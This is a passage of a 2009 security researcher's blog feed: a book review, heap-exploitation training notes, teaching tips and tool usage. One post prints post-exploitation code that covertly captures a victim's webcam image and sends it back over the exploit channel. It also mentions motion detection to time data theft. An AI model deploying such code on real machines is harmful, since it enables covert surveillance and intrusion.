href="http://www.amazon.com/Gray-Hat-Python-Programming-Engineers/dp/1593271921"&gt;"Gray Hat Python"&lt;/a&gt;, to teach yourself how to be a Python "hacker".&lt;br /&gt;  Don't expect this book to teach you what you are not; that would be hard. But do expect this book to help you put your knowledge and ideas into a usable tool. That is what Python is all about.&lt;br /&gt;  Justin is an experienced reverse engineer and a tool person; I know that because I recommended him for his position at Immunity, when he was an early fan of the Immunity Debugger project.&lt;br /&gt;  And he applied his years of experience to a book that answers the question "What exactly do I need to learn from Python to start writing my tools?"&lt;br /&gt;  The book is well-written and direct. Through the 12 chapters, he will walk you through the concepts of debugging and fuzzing, and teach you how to write scripts to extend the capabilities of the best tools around: PyDbg, Immunity Debugger, Sulley, IDAPython and PyEmu.&lt;br /&gt;  And if that wasn't enough, he will go step by step through writing your own debugger in Python, covering everything from basic exception handling to hardware breakpoints.&lt;br /&gt;&lt;br /&gt;  I recommend this book for anyone who wants to get their hands dirty with Python for the first time, either writing a tool or even an exploit, because we always say at Immunity that exploiting is nothing more than intelligent debugging.&lt;br /&gt;&lt;br /&gt;Peace&lt;br /&gt;Nico&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-5609709170512508617?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/5609709170512508617/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' 
href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=5609709170512508617' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5609709170512508617'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/5609709170512508617'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/05/book-review-gray-hat-python.html' title='Book review: Gray Hat Python'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-7108538177953708215</id><published>2009-04-26T05:40:00.000-07:00</published><updated>2009-04-26T05:55:52.089-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='miami'/><category scheme='http://www.blogger.com/atom/ns#' term='training'/><category scheme='http://www.blogger.com/atom/ns#' term='heap overflow'/><title type='text'>MEMO: Heap training</title><content type='html'>Dear diary,&lt;br /&gt;  I'm finally back, but just for a short message. 
Between writing exploits, developing material with Kostya for the "Windows shellcode writing" class (check out syscan.org for more information) and living, I didn't have much time left.&lt;br /&gt;  This small post is just to announce that I'm going to be teaching the Heap class May 11-14 in Miami Beach (&lt;a href="http://www.immunityinc.com/education-currentschedule.shtml"&gt;more info&lt;/a&gt;).&lt;br /&gt;  I usually try to update the material of the class; in fact, I can't recall a class in which I used exactly the same material as the one before.&lt;br /&gt;  This time I'm going to add more information about XP/2003 bypassing, especially where there is no lookaside (which was the case with an exploit a week ago), and probably explain (with an exercise) the FreeListInUse trick. &lt;br /&gt;  For those of you lucky enough to make it, Nicolas Pouvesle will be explaining one of the introduced subjects.&lt;br /&gt;&lt;br /&gt;Peace,&lt;br /&gt;Nico (Waisman)</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/7108538177953708215/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=7108538177953708215' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/7108538177953708215'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/7108538177953708215'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/04/memo-heap-training.html' title='MEMO: Heap training'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-3091330155584855305</id><published>2009-04-13T18:56:00.000-07:00</published><updated>2009-04-14T12:40:10.902-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='mosdef'/><category scheme='http://www.blogger.com/atom/ns#' term='motion detection'/><category scheme='http://www.blogger.com/atom/ns#' term='webcam picture'/><category scheme='http://www.blogger.com/atom/ns#' term='hacking'/><title type='text'>Hacking like in the movies (or how to take a picture with your webcam)</title><content type='html'>Dear diary,&lt;br /&gt;  When you spend a lot of time diving into the heap for an exploit without any significant result, you start feeling the lack of productivity.&lt;br /&gt;  To avoid that feeling, from time to time I stop what I'm doing and get myself into a lame pet project to clear my mind; in this case it was taking a picture with the webcam.&lt;br /&gt;  It's actually quite simple, unless you follow the CF_BITMAP path, in which case you will lose a day until you figure out that the solution is CF_DIB.&lt;br /&gt;  The key feature of MOSDEF is that it lets you avoid touching disk or executing commands unless it's really needed; this gives a tremendous post-exploitation advantage over host-based IDS. Each time I see people uploading a file and executing it, it chills my spine.&lt;br /&gt;  MOSDEF basically compiles C code into process-independent shellcode that resolves API functions remotely; as you might guess, everything gets executed inside the exploited process.&lt;br /&gt;  The first step in writing a MOSDEF C post-exploitation command is to find out which API functions you need, in this case, to get a picture from the webcam. 
The first Google choice was to use DirectShow, which is probably the smartest idea, but translated into MOSDEF it could be a little bit time consuming (yes, tomorrow I'm back to more heap). So my selection was capCreateCaptureWindow.&lt;br /&gt; #import "remote", "avicap32.dll|capCreateCaptureWindowA" as "capCreateCaptureWindowA"&lt;br /&gt;       &lt;br /&gt;  This function creates a video window (which you can obviously start hidden) and returns its handle. Based on the handle, you can send different messages to either record video or take a picture.&lt;br /&gt;  In my case it was the second option, so I did the following:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;          // Create a Window and connect it to the driver&lt;br /&gt;   hwnd = capCreateCaptureWindowA("CANVAS", 0x40000000, 0, 0, 640, 480, proghwnd, 0);&lt;br /&gt;   SendMessageA(hwnd, 1024+10 ,0,0);  // wm_cap_driver_connect&lt;br /&gt;   SendMessageA(hwnd, 1024+50 ,1,0);  // wm_cap_set_preview&lt;br /&gt;   SendMessageA(hwnd, 1024+52 ,30,0); // set_previewrate&lt;br /&gt;&lt;br /&gt;   // Get a Frame and copy it to the clipboard&lt;br /&gt;   SendMessageA(hwnd, 1084,0,0);      // get_frame&lt;br /&gt;   SendMessageA(hwnd, 1054,0,0);      // wm_cap_copy copy to clipboard&lt;br /&gt;&lt;br /&gt;&lt;/blockquote&gt;   You would think this is the hard part, but what took me more time was grabbing the picture out of the clipboard, since I tried to grab it as a CF_BITMAP and it didn't work out as expected.&lt;br /&gt;   The solution was to grab it as CF_DIB, which returns a memory object containing a BITMAPINFO structure followed by the actual raw image.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;   hbitmap = GetClipboardData( 8 ); // CF_DIB&lt;br /&gt;          pbih = GlobalLock( hbitmap );&lt;br /&gt;   pBits = pbih + 49;&lt;br /&gt;&lt;br /&gt;   hor  = pbih-&gt;biWidth; &lt;br /&gt;          vert = pbih-&gt;biHeight;&lt;br /&gt;          bpp  = pbih-&gt;biBitCount/8; &lt;br /&gt;   size = hor * vert * bpp 
;&lt;br /&gt;&lt;br /&gt;          sendint(hor);&lt;br /&gt;   sendint(vert);   &lt;br /&gt;   senddata2self(pBits, size);&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;   This simply gets wrapped into a small Python command called "saycheese".&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_aUReV5sSeqk/SePxm9USFhI/AAAAAAAAFsk/8D5z6kVLvRM/s1600-h/graph1.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 179px;" src="http://3.bp.blogspot.com/_aUReV5sSeqk/SePxm9USFhI/AAAAAAAAFsk/8D5z6kVLvRM/s320/graph1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5324364836079015442" /&gt;&lt;/a&gt;&lt;br /&gt;   After it gets executed, you will get a scary face like this one inside your screenshot section.&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_aUReV5sSeqk/SePx42ud9MI/AAAAAAAAFss/jGuLRWyfipI/s1600-h/graph2.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 187px;" src="http://2.bp.blogspot.com/_aUReV5sSeqk/SePx42ud9MI/AAAAAAAAFss/jGuLRWyfipI/s320/graph2.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5324365143547442370" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;   Neat; a picture is worth a thousand words, at least for your boss or your clients. &lt;br /&gt;   But if you are one of those owl hackers (*blink*) who wait into the deep of the night for your prey to stop using the machine so you can start downloading the 3GB database, you can rest now.&lt;br /&gt;   I added a small script that runs our motiondetection command, which returns the motion percentage based on two pictures taken through the webcam (the algorithm is quite simple: just compare pixel by pixel to find changes).&lt;br /&gt;   Aside from the percentage, it returns a neat picture showing the place where motion was found. 
(NOTE: Any resemblance of any character to any actual person, whether living or dead, is purely coincidental, especially with that Keanu Reeves movie).  &lt;br /&gt;&lt;br /&gt;  &lt;a href="http://2.bp.blogspot.com/_aUReV5sSeqk/SeP0eJpQKyI/AAAAAAAAFs0/rYvGD9IeybI/s1600-h/screengrab-786.bmp"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_aUReV5sSeqk/SeP0eJpQKyI/AAAAAAAAFs0/rYvGD9IeybI/s320/screengrab-786.bmp" border="0" alt="" id="BLOGGER_PHOTO_ID_5324367983304256290" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;EDIT: Juano@Netifera shared his knowledge on the subject. To improve the accuracy of the motion detection algorithm, you can take a couple of pictures and build an array of the average pixel value at each position; that will give you a decent background image to compare against. &lt;br /&gt;&lt;br /&gt;Peace&lt;br /&gt;Nico</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/3091330155584855305/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=3091330155584855305' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3091330155584855305'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/3091330155584855305'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/04/hacking-like-in-movies-or-how-to-take.html' title='Hacking like in the movies (or how to take 
a picture with your webcam)'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_aUReV5sSeqk/SePxm9USFhI/AAAAAAAAFsk/8D5z6kVLvRM/s72-c/graph1.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6355930281826403435</id><published>2009-03-31T10:44:00.000-07:00</published><updated>2009-03-31T10:53:31.495-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='conflicker'/><category scheme='http://www.blogger.com/atom/ns#' term='argentina'/><category scheme='http://www.blogger.com/atom/ns#' term='ms08-067'/><title type='text'>Sean eternos los laureles...</title><content type='html'>It seems there is an unusual number of computers infected with that Conficker worm, the Paris Hilton of worms (quoting some blog whose URL I lost), in Argentina, as this CAIDA research shows: &lt;a href="http://www.caida.org/research/security/ms08-067/conficker.xml"&gt;http://www.caida.org/research/security/ms08-067/conficker.xml&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.caida.org/research/security/ms08-067/telescope.tcp445.nov21.norm.log.animated.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 1149px; height: 583px;" src="http://www.caida.org/research/security/ms08-067/telescope.tcp445.nov21.norm.log.animated.gif" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Argentina stands out as having a disproportionately large number of infected IP addresses&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;Two theories:&lt;br /&gt;o Either the 
Conficker worm was created here (yes, I'm talking about you)&lt;br /&gt;o or their MS08-067 exploit works pretty well on Spanish Windows.&lt;br /&gt;&lt;br /&gt;If tomorrow morning, when you are reading the news, you start seeing a large number of Maradona pictures, you will know the correct answer.</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6355930281826403435/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6355930281826403435' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6355930281826403435'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6355930281826403435'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/03/sean-eternos-los-laureles.html' title='Sean eternos los laureles...'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-2123912319526201268</id><published>2009-03-30T11:36:00.000-07:00</published><updated>2009-03-30T12:09:07.281-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='exploits'/><category scheme='http://www.blogger.com/atom/ns#' term='chunkanalizehook'/><category scheme='http://www.blogger.com/atom/ns#' term='immunity debugger'/><category 
scheme='http://www.blogger.com/atom/ns#' term='heap overflow'/><title type='text'>Small tools, Big hearts: A guide to Caring for your little tool</title><content type='html'>Dear Diary,&lt;br /&gt;  Bas always says that exploiting is nothing more than intelligent debugging. I agree, especially because I probably have a couple of weeks of more debugging ahead of me...&lt;br /&gt;&lt;br /&gt;  So if that's your case too, let me give you a hand:&lt;br /&gt;&lt;br /&gt;  Let's say you are planning your heap primitive. These days, you have to aim for something like the Lookaside single-list pointer, the Bitmask trick (a.k.a. a free chunk &lt; 1024 that is the only entry of that freelist, or just a free chunk) or any other of the Brett Moore tricks.&lt;br /&gt;    &lt;br /&gt;  The point is that you need a special heap layout so that when the actual overwrite happens, you modify exactly the chunk you plan to. That takes a lot of time, brain cells and a basket of trial and error.&lt;br /&gt;   To help you reduce that time, we wrote this simple hook script, which has been in ID for years: &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;!chunkanalizehook -a ADDRESS  (exp)&lt;br /&gt;&lt;/span&gt;  &lt;span style="font-weight:bold;"&gt;ADDRESS&lt;/span&gt;    address of the place where you want to set the hook&lt;br /&gt;  &lt;span style="font-weight:bold;"&gt;(exp)&lt;/span&gt;    expression to calculate the chunk address&lt;br /&gt;&lt;br /&gt;   The basic idea is that you set the hook on the code address right before the actual overwrite is going to happen, and it will automatically dump the chunk given by the "expression" argument and the next couple of chunks.&lt;br /&gt;   For example, let's say you have this piece of code:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;color:#0000FF"&gt;     402020:  MOV EDI,DWORD PTR DS:[EAX]&lt;br /&gt;     402022:  SHR ECX,2&lt;br /&gt;     402025:  REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]&lt;/span&gt;&lt;br 
/&gt;   &lt;br /&gt;   When EIP points to the instruction at 402022, EDI will point to the data of the chunk being overwritten. So what you have to do is set chunkanalizehook at the beginning of that chunk (the chunk header sits 8 bytes before its data):&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;   !chunkanalizehook -a 0x402022 EDI - 0x8&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;   And you can now run your exploit; each time that instruction gets executed, you will see the heap dump in the Immunity Debugger Log Window (Alt+L):&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;034CBC58   &gt; Hit Hook 0x00402022, checking chunk: 0x034cbc58&lt;br /&gt;===============================================&lt;br /&gt;0x034cbc58&gt; size:    0x00000520  (00a4)  prevsize: 0x00000050 (000a)&lt;br /&gt;            heap:   *0x00000000*         flags:    0x00000001 (B)&lt;br /&gt;0x034cc178&gt; size:    0x00000410  (0082)  prevsize: 0x00000520 (00a4)&lt;br /&gt;            heap:   *0x00000000*         flags:    0x00000000 (F)&lt;br /&gt;            next:    0x035fd930          prev:     0x034c0178&lt;br /&gt;0x034cc588&gt; size:    0x000002a8  (0055)  prevsize: 0x00000410 (0082)&lt;br /&gt;            heap:   *0x00000000*         flags:    0x00000001 (B)&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;   The first chunk is the overwriting chunk; the second one is the one that is soon going to get modified. 
&lt;br /&gt;   Seems I'm not lucky yet; hopefully you are.&lt;br /&gt;&lt;br /&gt;Peace,&lt;br /&gt;Nico       &lt;br /&gt;PS: Take a look at the Python script (PyCommands folder); it can be improved quite easily!</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/2123912319526201268/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=2123912319526201268' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2123912319526201268'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/2123912319526201268'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/03/small-tools-big-hearts-guide-to-caring.html' title='Small tools, Big hearts: A guide to Caring for your little tool'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6314689504954545485</id><published>2009-03-26T13:54:00.000-07:00</published><updated>2009-03-31T10:58:10.294-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='trainings'/><category scheme='http://www.blogger.com/atom/ns#' term='immunity'/><category scheme='http://www.blogger.com/atom/ns#' term='cyberdefense'/><category scheme='http://www.blogger.com/atom/ns#' term='experience'/><category 
scheme='http://www.blogger.com/atom/ns#' term='japan'/><category scheme='http://www.blogger.com/atom/ns#' term='heap overflow'/><title type='text'>Technical trainings: The good, the bad, the weird.</title><content type='html'>Dear Diary,&lt;br /&gt;  I'm back in Buenos Aires again, enjoying the end of the summer. The training madness is over, until next &lt;a href="http://www.immunityinc.com/education-currentschedule.shtml"&gt;May&lt;/a&gt;, when I'm back with the heap overflow class.&lt;br /&gt;  Don't get me wrong, teaching is my favourite task at Immunity and outside of it (next week I'm going to start as a teaching assistant for the subject "Ethics" at a local university; Greek tragedy is what I will be explaining). But the truth is that training takes a lot out of you, and at the same time it gives you so much.&lt;br /&gt;  My favourite part is day two, when everything starts making sense and you can see people really enjoying each exercise as they put all the pieces together. &lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_aUReV5sSeqk/ScvwmeByy-I/AAAAAAAAFqs/JLxQMszathE/s1600-h/japan2.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 214px;" src="http://1.bp.blogspot.com/_aUReV5sSeqk/ScvwmeByy-I/AAAAAAAAFqs/JLxQMszathE/s320/japan2.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5317608328727284706" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  The Japanese training was amazing; I couldn't have enjoyed it more. 
The class was fun and entertaining; at the beginning of the class one of the guys introduced himself as Shoichi Nakagawa, Japan's minister of finance who gave a press conference drunk.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_aUReV5sSeqk/Scvwl0_sJEI/AAAAAAAAFqk/v9zORr_4nSI/s1600-h/japan1.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 124px;" src="http://1.bp.blogspot.com/_aUReV5sSeqk/Scvwl0_sJEI/AAAAAAAAFqk/v9zORr_4nSI/s320/japan1.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5317608317712606274" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  The only big problem I had was obviously the language. I had two girls translating, but it wasn't simultaneous, so I had to pause after each phrase to get it translated. &lt;br /&gt;  The trick I pulled to make it more dynamic was to have a random student who had finished the exercise explain what he did and why on the projector computer. It was a win-win situation: students got a second explanation in Japanese, while explaining helped the selected student understand the subject even more deeply by being able to teach it.&lt;br /&gt;  People there were quite nice; we had pizza and some drinks on the first day, and at some point everyone got in a circle and started giving a small speech about who they were and what they expected from the class. 
I wish I could do that in every class!&lt;br /&gt;  I guess the main problem I had with the language was not being able to listen to what students talked about among themselves; that's usually a key factor of a class, because it allows me to identify levels and give different exercises based on them.&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_aUReV5sSeqk/Scv0Hkn4jnI/AAAAAAAAFrM/vE3bd6RcDnY/s1600-h/dsc01473.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/Scv0Hkn4jnI/AAAAAAAAFrM/vE3bd6RcDnY/s320/dsc01473.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5317612195968224882" /&gt;&lt;/a&gt;&lt;br /&gt;  Japan itself was amazing, and I want to thank, here on the website, the people from Cyberdefense (Jack-san, Lauri-san, Yusuke-san and Matsumoto-san) for the big hand they gave me with the training.&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_aUReV5sSeqk/Scv0H16nmlI/AAAAAAAAFrU/DXIU8gusW18/s1600-h/dsc01467.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://4.bp.blogspot.com/_aUReV5sSeqk/Scv0H16nmlI/AAAAAAAAFrU/DXIU8gusW18/s320/dsc01467.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5317612200610208338" /&gt;&lt;/a&gt;&lt;br /&gt;  They also took us to a traditional salaryman restaurant near Akihabara, where we tried different types of local dishes and the freshest sushi I have ever tried. 
(yes, all the fish in the picture were alive).&lt;br /&gt;  &lt;a href="http://2.bp.blogspot.com/_aUReV5sSeqk/Scv0IaCn9-I/AAAAAAAAFrc/4zAdMw9jPsk/s1600-h/dsc01462.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_aUReV5sSeqk/Scv0IaCn9-I/AAAAAAAAFrc/4zAdMw9jPsk/s320/dsc01462.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5317612210307463138" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;  Going back to the training: I went back from Japan to Buenos Aires, only to stay two days and then go back to Miami to give two more trainings with my dearest friend Kostya Kortchinsky. Those trainings were pretty good and we got quite a number of really skilled students; it was a real surprise to see everyone at the same level!&lt;br /&gt;  Back at the airport, waiting for my flight back to Buenos Aires, I put together a list of rules (or tips) that I had been collecting over the years:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; &lt;span style="font-weight:bold;"&gt;Never ever ever never&lt;/span&gt; start compiling and fixing stuff in the middle of the class (only about 10 minutes max is allowed).&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Don't look insecure.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Be comfortable with your material; remember to read it and know exactly what is coming next. It's really common to get excited and start explaining stuff that appears later.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Always tell war stories.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Most difficult task: be prepared for the most advanced student and for the most inexperienced. 
&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Don't spent your entire class on the slow students: Try to push him, help them as much as possible, but don't loose the track of the class. You request at the beginning of the class for basic requirements that is the student responsibility to get before class.  &lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Always bring extra exercises.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Real life examples is always a win. People enjoy owning a real server vs your exercise server.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Improvization is good and people will appreciate it, only when your material is solid.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Not knowing the answer of all the question is ok. You are not god neither Kostya.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Exercise, Exercise and more Exercise. Always support your material with hand-ons exercise.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Students love owning stuff, if they can archive shellcode execution they will be happy++. The satisfaction of writing a workable exploit is priceless, even tho is on your "hoolio" server.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; Be progressive with your exercise. 
Each exercise has to teach at least one new thing or introduce a new challenge.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;o&lt;/span&gt; One, two, even three challenges per exercise are OK, but try not to overwhelm the students.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;Peace,&lt;br /&gt;Nico</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6314689504954545485/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6314689504954545485' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6314689504954545485'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6314689504954545485'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/03/technical-trainings-good-bad-weird.html' title='Technical trainings: The good, the bad, the weird.'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_aUReV5sSeqk/ScvwmeByy-I/AAAAAAAAFqs/JLxQMszathE/s72-c/japan2.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6160482188120720191</id><published>2009-03-20T19:07:00.000-07:00</published><updated>2009-03-20T19:16:43.162-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' 
term='0days'/><category scheme='http://www.blogger.com/atom/ns#' term='no more free bugs'/><title type='text'>no more free bugs?</title><content type='html'>Is it me, or is this "no more free bugs" &lt;a href="http://www.immunityinc.com/downloads/ApologyofOdays.pdf"&gt;movement&lt;/a&gt; as old as Methuselah?&lt;br /&gt;I think the real challenge would be "no more pennies for bugs".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nico&lt;br /&gt;PS: Does fame count as money? Because I have seen a lot of bugs paid for with that currency.</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/6160482188120720191/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=6160482188120720191' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6160482188120720191'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/6160482188120720191'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2009/03/no-more-free-bugs.html' title='no more free bugs?'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-3801988476811558383</id><published>2009-02-10T14:47:00.001-08:00</published><updated>2009-02-10T15:02:40.633-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' 
